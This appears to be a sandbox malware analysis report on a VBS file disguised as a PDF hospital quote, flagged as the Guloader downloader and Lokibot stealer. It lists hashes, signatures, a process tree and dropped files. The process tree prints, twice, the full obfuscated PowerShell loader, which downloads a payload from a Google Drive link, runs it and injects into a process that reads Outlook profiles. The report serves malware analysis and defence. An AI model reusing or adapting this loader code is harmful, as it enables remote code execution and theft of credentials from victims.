Overview

overview

10

Static

static

1

QUOTE AL Z...df.vbs

windows7-x64

10

QUOTE AL Z...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-04-2024 15:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    QUOTE AL ZARQA MILITARY HOSPITAL·pdf.vbs

  • Size

    361KB

  • MD5

    fe62c58bcc975e7ebbd268b44a518785

  • SHA1

    696f215f0abe6f1513ddd0a6e8235d99fa5da7fe

  • SHA256

    67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58

  • SHA512

    5d70692b8c4b95c61d08c07b1eff6d98ebf58692a10af71281a1fba06a94cb25102803bf1776a5546798427b7a4a76bf62bd3538ed7e7a063f27326df484cc80

  • SSDEEP

    6144:6Q1LaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkP/:bKInOiANKdGs

Score
10/10
guloaderlokibotcollectiondownloaderspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QUOTE AL ZARQA MILITARY HOSPITAL·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4376
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
        3⤵
          PID:4148
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
            4⤵
              PID:2428
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:3788
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3436 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:404

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Delphine.txt
          Filesize

          2KB

          MD5

          2f7fb3ef1989d949377e1d28986ef035

          SHA1

          c511addc5186429e6484910981601ff9a59fab6a

          SHA256

          98f2c67477c5a623a2cfb03f724c03d89d16c2a2743f60ff8503552cae39dec5

          SHA512

          3d1c1510779d56576f012ede9862b4f74392485a0cb45bde24275969b2ac3f81a1950313843fbf4ecc339b7ac19708bcbc5aa5dc72080aa8dc5ae2c4bbbdda79

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Delphine.txt
          Filesize

          4KB

          MD5

          d144cda286ec0b8c2fec74bd74f1cece

          SHA1

          9663c80537d50312a5e861b9ab5aee8ed8633c06

          SHA256

          1d96c25bac36432b5adec41e5ac051ab3578539fb73331023620fdb585de368b

          SHA512

          b0aaf689594f8a35d3ab40c32f4d4ef453ce5266f0437d4cc2901423b68a8fe1c46a0169e8c17a043e1c401757926254b929ca5f7587384a07fc24303320e0e2

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Delphine.txt
          Filesize

          745B

          MD5

          75132c80da9449c6195bc5c2d7e8c211

          SHA1

          9d58d6704011ed8db663fc74eada96a9c128426c

          SHA256

          bec6e1e263986408b7d5ba05adc310056c52db9754ece94aa219453973f48af2

          SHA512

          7c892094a78144fae431e4ff3372370693e38efaec4ed89f179cd90af16c0e002c180fcaa93de25a7ca269c2b96274c0ca94be3590fb3e2e99a71080fafcf487

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Delphine.txt
          Filesize

          1KB

          MD5

          935a5331e29d259464d926cc8b576ad0

          SHA1

          4a257b355b826566d0d15224545e2e232bc186ed

          SHA256

          3377e8189c48d41d1ac88f169db466dbef36b931a86ef414f84d676a350af2a5

          SHA512

          d6457e5090bfc2954002f03689289d097764b1d9fa92d2f19af27855fb48a9949f916202794fc21c785ca5eb2f640efa8ea276ae5677d1a1cc74921315d61bcf

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Delphine.txt
          Filesize

          2KB

          MD5

          83282c2eaf4d0688ea079967f759f4e4

          SHA1

          ea891822ec17e5fba8df8e328ce6605b09548c51

          SHA256

          375090a829e6529993a2006445ab7d8a866e9e92c1cc6e590a85f1a762db56b7

          SHA512

          0ba34cb2a84d1d7f8c0b3efd41e3e13e1ec3800cd3f31c78d9f239e05314626d8fc6e41f98b9afd63735e9e34e71dd17a7dd1584afc5f6478ebefc133c88aa6b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1aoro41j.gry.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Paps.Thi
          Filesize

          453KB

          MD5

          62a2406a56d4b84b4baad2d1c1a7479a

          SHA1

          2c08075d427f4ceba89260ef86e4469df1b5d398

          SHA256

          0239013ba33c599fcde5d5da6d6c31d9dd480871312edc0cafb840045da598e6

          SHA512

          01deccd705b9f4f5baa720c0646e1a09624fd7eb4db6ee716792ecf80c00c585a23a06ff0964bb09742f3716b5863c0c7160af7e1a9636feabcc2575d4c8a8ff

          Download Submit

        • memory/2892-371-0x0000000009040000-0x000000000A7AE000-memory.dmp

          Filesize

          23.4MB

          Download

        • memory/2892-359-0x00000000050E0000-0x00000000050F0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2892-405-0x0000000009040000-0x000000000A7AE000-memory.dmp

          Filesize

          23.4MB

          Download

        • memory/2892-399-0x0000000074DA0000-0x0000000075550000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2892-346-0x0000000006010000-0x0000000006076000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2892-374-0x00000000050E0000-0x00000000050F0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2892-373-0x00000000050E0000-0x00000000050F0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2892-375-0x00000000777C1000-0x00000000778E1000-memory.dmp

          Filesize

          1.1MB

          Download

        • memory/2892-339-0x0000000074DA0000-0x0000000075550000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2892-342-0x00000000050E0000-0x00000000050F0000-memory.dmp

          Filesize

          64KB

          Download

